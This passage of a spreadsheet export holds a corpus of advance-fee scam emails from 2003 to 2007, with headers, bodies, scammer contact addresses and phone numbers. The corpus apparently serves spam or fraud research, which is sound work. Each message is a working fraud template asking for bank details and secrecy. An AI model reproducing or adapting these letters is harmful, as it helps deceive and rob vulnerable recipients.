the transfer. You should \ncontact me immediately as soon as you  receive this mail,\n\nTrusting to hear from you immediately.\n\nYours faithfully.\nMr Alpha Kone\n\nN/B: CALL ME AS SOON AS YOU RECEIVE THIS MAIL OR WRITE EMAIL,\n\nE-MAIL: alph_ako01@mail.ru\n\nTEL: +226-76-45-08-13.\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2625</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr.Al_hadji Azizi . &lt;azialji1@yahoo.fr&gt;\nDate: Thu, 19 Oct 2006 15:47:29 +0200</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 15:47:29 +0200</t>
  </si>
  <si>
    <t>Mr.Al_hadji Azizi . &lt;azialji1@yahoo.fr&gt;</t>
  </si>
  <si>
    <t>From Mr. Al_hadji,</t>
  </si>
  <si>
    <t>Mr.Al_hadji Azizi.\ncomputer manager citibank\nDakar Senegal branch, \nE_mail:al_jiaziz@yahoo.fr\n\nMy Dear, \nIn order to transfer out (Seven -million five hunderd thousand UDS) from our bank here in Dakar Senegal,the owner of this account in Mr.Dow D.Rice,a foreigner and the manager of petrol chemical service here in Dakar Senegal.\n\nMr.Dow D.Rice with his family went to his country New York, USA for a summer vacation, after a year and some months we heard that Mr.Dow D.Rice and his family had a plane crash with American Airlines Flight 587, Website: [URL]http://www.airsafe.com[/URL] .\n\nMr.Dow D.Rice was a chemical engineer by proffession and he died on 12 November 2001,at Approximately 9:17 A.M local time, American Airlines Flight 587, an Airbus A300-600. The amount involved is ($7.5) USD. I want to transfer this money into a safe foreign account abroad but I don't know any foreigner who will assist me in this regard, Hence, I contated you to assist me.\n\nI know that this massage will come to you as a surprise as we don't know our self before,but be rest-asured that it is real and a genuine business. I believe in God that you will never let me down in this investment.\n\nYour full contact information phone and fax number,name will be necessary for this effect. \nHope to hear from you immediately. Contact me with this email addres:al_jiaziz@yahoo.fr\nThanks.\nMr.Al_hadji Azizi .\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.airsafe.com</t>
  </si>
  <si>
    <t>2623</t>
  </si>
  <si>
    <t>To: nan\nFrom: danjuma ali &lt;danjuma_7@hotmail.com&gt;\nDate: Thu, 19 Oct 2006 12:26:09 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 12:26:09 +0000</t>
  </si>
  <si>
    <t>danjuma ali &lt;danjuma_7@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT AND CONFIDENTIAL.</t>
  </si>
  <si>
    <t>DR DANJUMA ALI\nBILL AND EXCHANGE MANAGER,\nAFRICAN DEVELOPMENT BANK\nOUAGADOUGOU, BURKINA FASO.\n\n\nDear Sir,\n\nI am the manager of bill and exchange at the foreign remittance department \nof African Development Bank (ADB). I got your address in Burkina faso \nchamber of commerce through yahoo details.\nIn my departmentn we discovered an abandoned sum of $ 30 m US dollars\n(Thirty Millon US dollars) . In an account that belongs to one of our\nforeign customer who died along with his entire family in a concord plane \ncrash in the year 2003 in paris that almost took the whole life of the \npasengeres on board.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines but unfortunately we learnt that all his \nsupposed next of kin or relation died alongside with him at the plane crash \nleaving nobody behind for the claim. It is therefore upon this discovery \nthat I and other officials in my department now decided to make this \nbusinness proposal to you and release the money to you as the next of kin or \nrelation to the deceased for safety and subsequent disbursement since nobody \nis coming for it and we don;t want this money to go into the Bank treasury \nas unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after three years, the money will be transfered into the Bank \ntreasury account as unclaimed fund. The request of foreigner as next of kin \nin this business is occasioned by the fact that the customer was a foreigner\nand a Burkinabe cannot stand as next of kin to a foreigner.\n\nWe agree that 40 % of this money will be for you as foreign partner, in \nrespect to the provision of a foreign account, 10 % will be set aside for \nexpenses incured during the business and 50 % would be for ;me and my \ncolleagues. There after I and my colleagues will visit your country for\ndisbursement accoding to the percentages indicated. Therefore to enable the \nimmediate trnansfer of this fund to you as arranged, you must apply first to \nthe bank as relations or next of kin of the deceased indicating your bank \nname, your bank account number, your private telephone and fax number for \neasy and effective communication and location where in the money will be \nremitted .\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application. I will not fail to bring to your notice that this \ntransaction is hitch free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer .\nYou should contact me immediately as soon as you receive this letter.\nTrusting to hear from you immediately.\n\nYour;s faithfully,\n\nDR DANJUMA ALI\n\n(Bill and exchange manager)\n\nAFRICAN DEVELOPMENT BANK.\n\nN.B.My intention of writing you through email is because I belive it is very\nconfidential.\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2622</t>
  </si>
  <si>
    <t>To: nan\nFrom: Noel PANGA &lt;panga113@hotmail.fr&gt;\nDate: Thu, 19 Oct 2006 06:42:57 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 06:42:57 +0000</t>
  </si>
  <si>
    <t>Noel PANGA &lt;panga113@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>GOOD MORNING.\n\n\nDONT BE OFFENDED IF I MAY HAVE DISTURBED YOUR DAILY ACTIVITIES.\n\n\nMY NAME IS MR NOEL PANGA, I AM A BANKER, AND I WORK WITH THE AFRICAN \nDEVELOPMENT BANK AS A SENIOR STAFF. I HAVE DECIDED TO CONTACT YOU ON A \nBUSINESS TRANSACTION THAT WILL BE VERY BENEFICIAL TO BOTH OF US AT THE END \nOF THE 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18.4M (EIGHTEEN MILLION,FOUR HUNDRED THOUSAND UNITED \nSTATES DOLLARS). AS IT MAY INTEREST YOU TO KNOW, I GOT YOUR IMPRESSIVE \nCONTACTS THROUGH INTERNET. MEANWHILE ALL THE WHOLE ARRANGEMENT TO PUT CLAIM \nOVER THIS FUND AS THE BONAFIDE NEXT OF KIN TO THE DECEASED, AND TRANSFER \nTHIS MONEY TO A FOREIGN ACCOUNT HAS BEEN PUT IN PLACE.  THE DIRECTIVES AND \nNEEDED INFORMATION WILL BE RELAYED TO YOU AS SOON AS YOU INDICATE YOUR \nINTEREST AND WILLINGNESS TO ASSIST ME, AND ALSO BENEFIT YOUR SELF TO THIS \n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50% WILL BE FOR ME.  PLEASE, YOU HAVE BEEN ADVICED TO \nKEEP "TOP SECRET" AS I AM STILL IN SERVICE AND INTEND TO RETIRE FROM SERVICE \n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F THE TRANSACTION INTEREST YOU, GET BACK TO ME WITH YOUR PHONE NUMBER TO \nCALL YOU SO WE COULD PROCEED.\n\n\nTHANKS.\n\nMR NOEL PANGA.\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2621</t>
  </si>
  <si>
    <t>To: nan\nFrom: george path &lt;george_path16@hotmail.fr&gt;\nDate: Thu, 19 Oct 2006 05:11:31 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 05:11:31 +0000</t>
  </si>
  <si>
    <t>george path &lt;george_path16@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>Dear Friend.\n\n\nAttention Please,\n\n\nI am Georg Path, the Director in charge of Auditing and Accounting section \nof AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West Africa. \nWith due respect and regard. I have decided to contact you on a business \ntransaction that will be very beneficial to both of us at the end of the \n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18.4M (Eighteen Million,Four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50% will be for me.  Please, you have been adviced to \nkeep "Top Secret" as I am still in service and intend to retire from service \n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George Path.\n\nMOBILE NUMBER: 00226 78 01 64 64.\n\n_________________________________________________________________\nDcouvrez un moyen pour liminez tous les virus de votre PC ! \n[URL]http://safety.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://safety.live.com</t>
  </si>
  <si>
    <t>2620</t>
  </si>
  <si>
    <t>To: nan\nFrom: george path &lt;george_path92@hotmail.fr&gt;\nDate: Thu, 19 Oct 2006 04:00:13 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 04:00:13 +0000</t>
  </si>
  <si>
    <t>george path &lt;george_path92@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM GEPRGE PATH.</t>
  </si>
  <si>
    <t>Dear Friend.\n\n\nAttention Please,\n\n\nI am Georg Path, the Director in charge of Auditing and Accounting section \nof AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West Africa. \nWith due respect and regard. I have decided to contact you on a business \ntransaction that will be very beneficial to both of us at the end of the \ntransaction .\n\n\nDuring our investigation and auditing in this bank, my department came \nacross a very huge sum of money belonging to a deceased person who died in a \nplane crash and the fund has been dormant in his account with this Bank \nwithout any claim of the fund in our custody either from his family or \nrelation before our discovery to this development.\n\n\nThe said amount was U.S 18.4M (Eighteen Million,Four Hundred Thousand United \nStates Dollars). As it may interest you to know, I got your impressive \ninformation through internet directory . Meanwhile all the whole arrangement \nto put claim over this fund as the bonafide next of kin to the deceased, get \nthe required approval and transfer this money to a foreign account has been \nput in place and directives and needed information will be relayed to you as \nsoon as you indicate your interest and willingness to assist, and also \nbenefit your self to this great business opportunity.\n\n\nIn fact I could have done this deal alone but because of my position in this \ncountry as a civil servant(A Banker),we are not allowed to operate a foreign \naccount and would eventually raise an eye brow on my side during the time of \ntransfer because I work in this bank. This is the actual reason why it will \nrequire a second party or fellow who will forward claims as the next of kin \nwith affidavit of trust of oath to the Bank and also present a foreign \naccount where he will need the money to be re-transferred into on his \nrequest as it may be after due verification and clarification by the \ncorrespondent branch of the bank where the whole money will be remitted from \nto your own designation bank account.\n\n\nI will not fail to inform you that this transaction is 100% risk free.On \nsmooth conclusion of this transaction, you will be entitled to 40% of the \ntotal sum as gratification, while 10% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone and \ninternet bills, while 50% will be for me.  Please, you have been adviced to \nkeep "Top Secret" as I am still in service and intend to retire from service \nafter we conclude this deal with you.\n\n\nI will be monitoring the whole situation here in this bank until you confirm \nthe money in your account and ask me to come down to your country for \nsubsequent sharing of the fund according to percentages previously indicated \nand further investment, either in your country or any country you advice us \nto invest in. All other necessary vital nformation will be sent to you when \nI hear from you.\n\n\nI look forward to receive your phone and fax numbers for easy communication,\n\n\nYours faithfully,\n\n\nGeorge Path.\n\n_________________________________________________________________\nDcouvrez un moyen pour liminez tous les virus de votre PC ! \n[URL]http://safety.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1311</t>
  </si>
  <si>
    <t>To: ba_philip01@yahoo.co.in\nFrom: ba philip &lt;ba_philip01@yahoo.co.in&gt;\nDate: Thu, 19 May 2005 11:46:51 +0100</t>
  </si>
  <si>
    <t>Thu, 19 May 2005 11:46:51 +0100</t>
  </si>
  <si>
    <t>ba philip &lt;ba_philip01@yahoo.co.in&gt;</t>
  </si>
  <si>
    <t>ba_philip01@yahoo.co.in</t>
  </si>
  <si>
    <t>Barrister  Philip Wilson</t>
  </si>
  <si>
    <t>Dear Friend,\n \nI hope this meets you in good health. My name is BarristerPhilip Wilson Esq,legal practitioner and Attorney to late Mr. Ziya Bazhayev who died in the plane crash of Yak-40 jetliner on March 9, 2000. You may follow the Link below to read about the Plane Crash my client lost his life:\n \n[URL]http://www.amarillonet.com[/URL], \n\n[URL]http://news.bbc.co.uk[/URL]\n\nMy late client was an influential wealthy businessman, a Contractor in my Country and a Russian big time Oil dealer and the Principal owner of Oil Alliance Company and he left behind a deposit of Twenty Five Million, Five Hundred Thousand United States Dollar ($25,500,000.00USD) in his domiciliary bank account in a commercial bank here in Ivory Coast. Which is one of the main reasons it has been very important to locate his next of kin. \n \nAfter the death of my client his bankers contacted me, as his Attorney to provide his next of kin who should inherit his fortune. The board of directors of his bank adopted a resolution and I was mandated to provide his next of kin for the payment of this money or forfeit the money to the bank as an abandoned Estate. The bankers had planned to invoke a clause in the property Act, to confiscate the funds after the expiration of a period given to me.\n \nIt was while i was searching for his family records on the internet that i came across your contact.I have searched through almost all the genealogy site that you can think of both in the \nRussia,USA and all the possible places I thought my clients would have possibly had a family member. Despairing and at the point of desperation, I came across your name, while trying to locate documentation's regarding possible relatives of my client in his country of origin. Convinced that you may be able to act in locus for my late client as his next of kin, I therefore, decided to contact you with these facts before me because of the status quo. By virtue of my brief and my closeness to the deceased, I am very much aware of my client's financial standing and the bank account he operates here in my country.\n \n \nI have reasoned very professionally and I feel it will be legally proper to present you as the next of kin of my deceased client and the sole beneficiary of his estate, so that you are be paid the funds left in his bank account, hence I contacted you. I seek your consent to present you as the Next of Kin; the bank needs only the facts as presented legally. The rest is between you and I and with my guide we can have the money paid into your account, once this is done we shall both share the funds. 50% to me and 40% to you, while 10% should be for Taxes as your Government may require, I shall assemble all the necessary Legal Documents that will be used to back up our claim. All I require is your honest cooperation to enable us see this deal through. \n\nI guarantee that this will be executed under a legitimate arrangement that will protect you from any Breach of law. Please get in touch with me.\n\n\nBest Regards,\n\n\nBarrister  Philip Wilson\n\n\n\n\n\n\nYahoo! India Matrimony: Find your life partneronline.</t>
  </si>
  <si>
    <t>http://www.amarillonet.com http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>1310</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr. Felix Kambala &lt;felixkambala@yahoo.com&gt;\nDate: Thu, 19 May 2005 11:41:21 +0200</t>
  </si>
  <si>
    <t>Thu, 19 May 2005 11:41:21 +0200</t>
  </si>
  <si>
    <t>Mr. Felix Kambala &lt;felixkambala@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Good day</t>
  </si>
  <si>
    <t>Dear Friend.\nMy name is Mr. Felix Kambala, the manager credit and foreign bills of African Developement Bank Ltd Dakar Senegal Branch . I am writing in respect of a foreign customer of my bank with account number 14-255-2004/adb/t, Mr.Gerald Smith who died in a plane crash (EgyptAir Flight 990)which crashed into the Atlantic Ocean on October 31st,1999 with other passengers on board.You can view this web site for more story of the inccident [URL]http://www.cnn.com[/URL] \nSince the death of this customer, I personally have watched with keen interest to see the next of kin but all has proved abortive as no one has come to claim his funds of US$13,000,000.00(Thirteen Million Dollars) which has been with my bank for a very long time. On this note I decided to seek for whose name shall be used as the next of kin as no one has come up to be the next of kin.\nIn view of this I got your contact through my country?s foreign trade mission after I was convinced by providence that your name could be used as the next of kin.The request of the foreigner as a next of kin in this business is occasioned by thefact that the customer was a foreigner and a Senegalias cannot stand as the next of kin to a Foreign client\n\nI agreed that 30% of this money will be for you as a foreign partner in respect of providing a new bank account or we can use your old accountinformation,while the rest will be for me, thereafter, I will visit your country for disbursement as I am almost due for retirement.Therefore, to facilitate the immediate transfer of this fund to your account as\narranged, we must engage the services of a lawyer to apply on your behalf to the bank as a relation to the deceased.I need you to indicate in your response, your private telephone and fax numbers for easy communication and your complete bank information where the money will be remitted into for our mutual benefit. Upon the receipt of your reply, I will send you by fax or e-mail the next step to take. I will not fail to bring to your notice that this business is hitch-free and that you should not entertain any fear as every modality and machinery for the success of this transaction have been put in place. \nYou should contact me immediately as soon as you receive this\nletter strictly on email for security reasons.\n\nTrusting to hear from you.\nYour respectfully,\nMr. Felix Kambala.\n\n\n\n\n</t>
  </si>
  <si>
    <t>3213</t>
  </si>
  <si>
    <t>To: nan\nFrom: princess gesinta &lt;princess_gesinta016@hotmail.fr&gt;\nDate: Thu, 19 Jul 2007 15:15:39 +0200</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2007 15:15:39 +0200</t>
  </si>
  <si>
    <t>princess gesinta &lt;princess_gesinta016@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friend  </t>
  </si>
  <si>
    <t>\nDear Friend  \n                 REPLY ME ON: princess_gesinta206@yahoo.fr  Good day and Compliments, I am writing this letter in confidence  believing that if it is the wish of God for you to help me and my family, God almighty will bless and reward you abundantly.\nMy family and I are true Christians and worship's God truthfully. I got your contact address from our Christians union office during my research on some one who could help us.Firstly,\nI must introduce myself I am a female student from University of Cotonou, Benin Republic.  I am 24 yrs old. I'd like any person who can becaring,loving and home oriented.I will love to have a long-term relationship with you and to know more about you.\n \nI would like to build up a solid foundation with you in time coming if you can be able to help me in this transaction. Well, my father died earlier three months ago and left my mother I and my junior brother behind. He was a Royal king in our community, which our town citizens titled him before his death.\n \nI was a princess to him and I and my brother are the only people who can take Care of his wealth now because mymother is not literate enough to know all my father's wealth he left behind. \n \nHe left up to USD 9.5,000.00 dollars (Nine Million, Five Hundred Thousand US Dollars) in one of the bank here, and Idon't know how and what I will do to invest this money somewhere in abroad, so that my father's kindred will not take overwhat belongs to my father and our family, which they were planning to do without my present because I am a female as stated by our culture in the town.\n \nThey have succeeded in taken over all our father properties here in cotonou, but do not know of this Fund in bank.That is why I felt happy when I saw your contact which I strongly believe that by the grace of God, you will help me secure and invest this money.\n \nI thereby needs your help in securing the consignment containing the money out from the bank here in Benin Rep, for investment,based on your reply I will furnish you with more details on how we can proceed.\n \n I am ready to offer you 30% of the total amount to you if you help us in securing this money and another 10% interest of Annual Income to you, for handling this business for us, which you will strongly have absolute control over. \n \nIf you can handle this project sincerely and also willing to assist me in lifting this fund,kindly reach me and I will let you know the next step to take towards actualizing this transaction as quickly as possible. Please, note that this transaction is 100% risk free. I look forward hearing from you soonest through my personal email address: princess_gesinta206@yahoo.fr for more clearifications. Regards.Yours sincerely, PRINCESS GESINTA  MEYORS FOR THE FAMILY\n_________________________________________________________________\nMake every IM count. Download Windows Live Messenger and join the i’m Initiative now. It’s free. \n[URL]http://im.live.com[/URL]</t>
  </si>
  <si>
    <t>3212</t>
  </si>
  <si>
    <t>To: nan\nFrom: chantal kouakou &lt;chant004@hotmail.fr&gt;\nDate: Thu, 19 Jul 2007 10:44:14 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2007 10:44:14 +0000</t>
  </si>
  <si>
    <t>chantal kouakou &lt;chant004@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>Salutation,</t>
  </si>
  <si>
    <t>\nSalutation,c'est avec respect et humilité que je vous j'écris pour solliciter de votre haute bienveillance, une assistance de grande importance.Je souhaite solliciter votre aide dans la migration et l'investissement dans votre pays  la fortune que j'ai hertitée de mon père . Brièvement, je suis une sierra léonaise agée de 22 ans et la fille unique du défunt DR Kouakou Bah Theodore. Jusqu'à sa mort, mon père était le Directeur général d'une société d'extraction d'or et de diamant dans la région de Kanema en Sierra Leone. Le 6 Avril 2002 les forces militaires fidèles au gouvernement d'Ahmed TIJAN KABBAH ont envahi la mine de diamant et d'or et ont assassiné mon père, le confondant avec son frère kouakou Sankoh qui est le député du (RUF) du révolutionnaire FODAY SANKOH.Quand ma mère, absente car venu me voir en côte d'ivoire où j'étudie dans une grande école a appris la nouvelle ,elle est retounée au pays malgré tous les risques et a récupéré certaines des affaires qu'elle jugeait sacrées pour mon père dans notre villa de famille. Parmi les objets récupérés figurait un dossier contenant des détails d'un dépôt que mon père a fait dans une société de compagnie de sécurité à Abidjan Côte d'Ivoire. Il y a déposé $ 10.500.000,00 (Dix millions cinq cent mille de dollars des États-Unis) contenus dans une (1) boîte de tronc à son nom. Il n'a pas révélé le vrai contenu de la boîte à cette société. Néanmoins il  a déclaré le dépôt comme biens de famille pour des raisons de sécurité. C'est l'argent que mon defunt père a gagné à partir de la vente de l'or et de diamants pendant son temps comme Directeur général. Compte tenu du climat politique instable en Cote d´Ivoire , j'ai décidé de chercher un partenaire afin d'investir cette somme hors de la Côte D'ivoire dans des domaines rentables,  c'est donc la raison pour laquelle je viens vers vous pour solliciter votre assistance et nous aider à investir dans votre pays. La meilleure méthode pour conclure cette transaction vue la tension politique en cote d´Ivoire, serait d'expédier la caisse contenant les fonds dans votre pays . La compagnie de sécurité a la possibilité de nous faciliter les choses en expédiant cette caisse dans votre pays par la voie diplomatique que j'apprécie beaucoup. Dès l'arrivée de ces fonds dans votre pays, vous allez les récupérer et les sauvegarder et engager les démarches pour nous aider à venir s'établir dansvotre pays. Ici en raison de sa proximité à notre pays et de la guerre, notrestatut de réfugié ici ne peut pas faciliter les affaires pour nous. Nous vous demandons également de rechercher des affaires fiables et lucratives, de sorte que nous puissions investir sagement. Nous avons à l'esprit de vous donner 15 % de toute la somme (10.500.000,00 millions de dollars $), et la part de 25% dans n'importe quel investissement que nous ferons au moment venu si vous acceptez de nous aider.  Cette fortune que nous vous avons indiquée devrait demeurer confidentielle.dans l'attente de vous lire.Au plaisir de collaborer avec vous. Bien à vous, Mlle  kouakou Chantal\n_________________________________________________________________\nSur Windows Live Ideas, découvrez en exclusivité de nouveaux services en ligne... si nouveaux qu'ils ne sont pas encore sortis officiellement sur le marché !\n[URL]http://ideas.live.com[/URL]</t>
  </si>
  <si>
    <t>http://ideas.live.com</t>
  </si>
  <si>
    <t>599</t>
  </si>
  <si>
    <t>To: abacha80@voila.fr\nFrom: abacha80 &lt;abacha80@voila.fr&gt;\nDate: Thu, 19 Feb 2004 15:43:13 +0100</t>
  </si>
  <si>
    <t>Thu, 19 Feb 2004 15:43:13 +0100</t>
  </si>
  <si>
    <t>abacha80 &lt;abacha80@voila.fr&gt;</t>
  </si>
  <si>
    <t>abacha80@voila.fr</t>
  </si>
  <si>
    <t>Greetings from Mrs. M. Abacha,</t>
  </si>
  <si>
    <t>Please Reply to: partnerindeed@voila.fr \n\nGreetings from Mrs. M. Abacha,\n\nl am sorry for the embarrassment this my letter might cause you as we have not had any correspondence before this letter. I got your contact address through your country's embassy and high commissions here in Lagos Nigeria,during my research for a reliable and trustworthy foreign partner who i will do business with, though l did not disclose the nature of the business l intend to do with whoever they will recommend for me for security reasons. \n\nI am MRS MARIAM ABACHA (A Moslem), wife and the widow of the late Nigeria Military Head of State, Late General Sani Abacha who died on the 8th of June, 1998 while still on active duty. l am contacting you in view of the fact that we will be of great assistance to each other likeness developing a cordial business relationship.\n\nl currently have within my reach the sum of Twelve Million US Dollars (US$12,000,000.00) cash which l intend to use for investment purposes, like Real Estates Development specifically in your country. This money came as a payback contract deal between my late husband and a Russian Firm on our countries multi-billion dollars Ajaokuta Steel Plant.  The Russian Partners returned my husband's share of  USD$12,000,000.00 after the death of my husband and lodged in my husband's security company of which l a director. Right now, the new Civilian Government headed by president olusegun obasanjo have intensified their probe on my husband's financial and oil company. In view of these, l acted fast to withdraw this US$12,000,000.00 from our  company's vault and deposited it with another Security Company for safe keeping. l have since declared our Security Company bankrupt. No record ever existedconcerning the money traceable by the government because  there is no documentation showing that we received this money from our Russian business partners.\n\nDue to the current situation in the country concerning government attitude towards my family, it has become quite impossible for me to make use of this money within. Let me refer you to the front page of (BBC World News of 12th August &amp; 4th September 2000). You can check it through their contact website at\n[URL]http://news.bbc.co.uk[/URL]\nand\n[URL]http://news.bbc.co.uk[/URL]\n\nThe present civilian government in Nigeria had seized and frozen all our bank accounts both here in Nigeria and abroad. Thus consent l shall expect you to contact me urgently to enable us discuss in detail about this transaction. Bearing in mind that your assistance is highly needed in proceeding to the Security Company and claim this fund for onward invesment in your country. l proposed a percentage of 30% of the total sum to you for the expected service and assistance, 5% for offsetting all minor expenses incurred in the course of this Transaction. Your urgent response is highly needed as to stop all further contacts. \n\nAll correspondence must be by my private email address above. I will give you my particulars including my personal picture for you to know me very clearly when l hear from you. I must use this opportunity to implore you to exercise the utmost indulgence and keep this matter extra ordinarily confidential whatever your decision while awaits your prompt response. I will also scan and send to you a copy of my photograph for your record keeping. Pls Note that some times to come,You might receive some messages that looks like this but you don't need to respond back to such messages because they are ikely to be our family enemies and impersonators who are trying to know the current  financial strenght of my late husband. (Sani Abacha).\n\nNB: Because of the security being mounted on the members of my family by the present civilian government headed by president olusegun obasanjo, l have decided that this transaction transaction will exist between you and my family Attorney and also my son,Abba Abacha, Therefore you can contact my son through our contact telephone numbers at: 234-80-33464921. Remember to include your private telephone, fax and mobile numbers for easy communication. Kindly get in touch through my email address at: partnerindeed@voila.fr \n\nBest Regards.\n\nMrs.Mariam Abacha.\n------------------------------------------\n\nFaites un voeu et puis Voila ! [URL]www.voila.fr[/URL] \n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk www.voila.fr</t>
  </si>
  <si>
    <t>3033</t>
  </si>
  <si>
    <t>To: nan\nFrom: moha william &lt;moha_william61@hotmail.co.uk&gt;\nDate: Thu, 19 Apr 2007 11:18:46 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2007 11:18:46 +0000</t>
  </si>
  <si>
    <t>moha william &lt;moha_william61@hotmail.co.uk&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">FAMILY IN NEED OF ASSISTANCE { this is not spam} </t>
  </si>
  <si>
    <t>FROM: MOHAMMED WILLIAMS\nJOHANNESBURG\nREPUBLIC OF SOUTH AFRICA\nTEL: +27-78-393-0704\nEmail: moha_william61@hotmail.com\n\nDear Sir,\n\n                                   PRIVATE AND HIGHLY CONFIDENTIAL\n\nGreeting! I know you will be surprised to read from me, but please this \nletter is a request from a family in dire need of assistance. I am Mr. \nMohammed Williams from Angola.The first and the only son of Brigadier Chanza \nWilliams communicating to you from Johannesburg, South Africa.\n\nI got your address from my random search at the net. And, I on behalf of my \nwidowed mother Mrs. Bridget Williams  decided to solicit for your assistance \nto transfer the sum of US$35.8 Million (Thirty five Million Eight Hundred \nThousand United States Dollars), which he deposited in a safe box to private \nsecurity company in Johannesburg, South Africa.\n\nIn fact, my father said, and I quote: My son, I wish to draw your attention \nto US$35.8 Million (Thirty five Million Eight Hundred Thousand United States \nDollars). I deposited the box containing the fund in a security company in \nJohannesburg, South Africa as valuables. During the war, I was very \ncommitted and dedicated in winning the war against the rebels, until I found \nout that the senior army officers and government functionaries were busy \nhelping themselves with government funds and properties, sending them to \nforeign countries. Due to this, when the former adviser to the president and \nI were assigned by the president (JOSE EDUARDO SANTOS) to purchase arms in \nSouth Africa, we saw this as a golden opportunity and diverted the money and \nshare it, of which I got a total sum of US$35.8 Million (Thirty five Million \nEight Hundred Thousand United States Dollars).\n\nIn case of my absence on earth as a result of death, only you should solicit \nfor assistance of a reliable and sincere foreign partner to assist you to \ntransfer this money out of South Africa for investment purpose. I deposited \nthe box in your name and you can claim it alone with deposited code. Your \nmother is with all the documents. Take good care of your mother and your \nsisters.\n\n&gt;From these words of my late father, you can understand that life and future \nof my family depend on this fund, as such I will be grateful if you can \nassist us. We are now living in South Africa as political asylum seekers. \nFinancial laws and regulations of the Republic of South Africa do not permit \nus certain financial rights. In view of this, I cannot invest this fund in \nSouth Africa hence; I am seeking your assistance to transfer this fund out \nof South Africa for investment purpose. For your assistance, we are prepared \nto offer you 25% of the total fund while 5% will be set aside for any \nexpenses incurred during this transaction.\n\nPlease note that this transaction is 100% risk-free and the major thing I \ndemand from you is to assure me the safety of this money when it finally \ngets to you. Further information and arrangement commence as soon as trust \nconfidence and good relationship are established. I shall be most grateful \nif you maintain the confidentiality of this matter. Please, confirm your \ninterest through the above contact telephone numbers or email.\n\nBest regards,\n\nMOHAMMED WILLIAMS.\n{For the family}\n\nAll responses should be sent to: mohammed_william4@yahoo.com\n\n_________________________________________________________________\nCould you be the guest MSN Movies presenter? Click Here to Audition \n[URL]http://www.lightscameraaudition.co.uk[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.lightscameraaudition.co.uk</t>
  </si>
  <si>
    <t>To: R@M\nFrom: micheal ado santigo &lt;micheal_ado@hotmail.com&gt;\nDate: Thu, 18 Sep 2003 13:54:07 +0200</t>
  </si>
  <si>
    <t>Thu, 18 Sep 2003 13:54:07 +0200</t>
  </si>
  <si>
    <t>micheal ado santigo &lt;micheal_ado@hotmail.com&gt;</t>
  </si>
  <si>
    <t>BUSINESS PROPOSER REQUESTING CHANGE OF OWNERSHIP</t>
  </si>
  <si>
    <t xml:space="preserve">ATTENTION\n\n\nDEAR SIR.\n\nMr.Dddddddd Rrrrr\n\n\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why this \ninformation was directed to you Sir.\n\nThis Money can not be climed by Me or any bady neither the family becuase of \nthe problem they are going through they are after the son becuase they have \nfind out that he is going to get back all that belongs to him but without \nthis Money. I beleive you understand Me. This is why this purpose was send \nto you. Sir why i said you should call for this Money is to stand as a \nbusiness partner of this late Mr. Fred yakubu Amendu. The son have said that \nwho ever stand on this purpose  to bring at this Money. He will pay the what \never the charge is. And this surviving son is only 20years of age.\n\nI am Mr. Micheal Ado Santigo. And I do know that through your support we can \ncarry on we this tranxation. So Sir before we go further i will want you to \nknow that i am not asking you to send me Money to bring out this consignment \ntill you know more about this tranxation and this purpose will need you \nAttention there In Madrid Spain. Till then you can only contact the people \nin charge of this Money with this contact.\n\nEmail&gt; ( john_kenedy_418@hotmail.com)\nEmail&gt; ( barris_jose_marri@hotmail.com)\n\nPersonal email contact is\n\nEmail&gt; ( micheal_ado@hotmail.com)\n\nSo hope to hear from you soon as porsible Sir. You can only contact this \npeople through mail first before their phone contact. Till then thanks you \nand god bless.\n\nBEST REGARD\n\nSINCAERLY\n\nMr. Micheal Ado?ATTENTION\n\n\nDEAR SIR.\n\nMr.\n\n\nI am sending you this fax for a purpose that can favour both of us Sir. I \nkonw  this mail may be a surprise to you cause we have not mait before. But \nhave Sir what i am going to shear  here with you is not a child game neither \ni am trying to dub you and i will only want you to beleive this purpose \ncause it min not come again.\n\nWhat we have here is a consignment that contain ( 20.00000Million DL) \ntweenty Million of dollers. This Money is uncleared because the owner of the \nMoney died some years ago. and belong to one Mr. Fred yakubu Amendu. And the \nonly surviving son and I have been looking forward to clime back this Money \nand there is no way. But a condition and that can only be done by a well \nknow person who have a company and we beleive that is you that is </t>
  </si>
  <si>
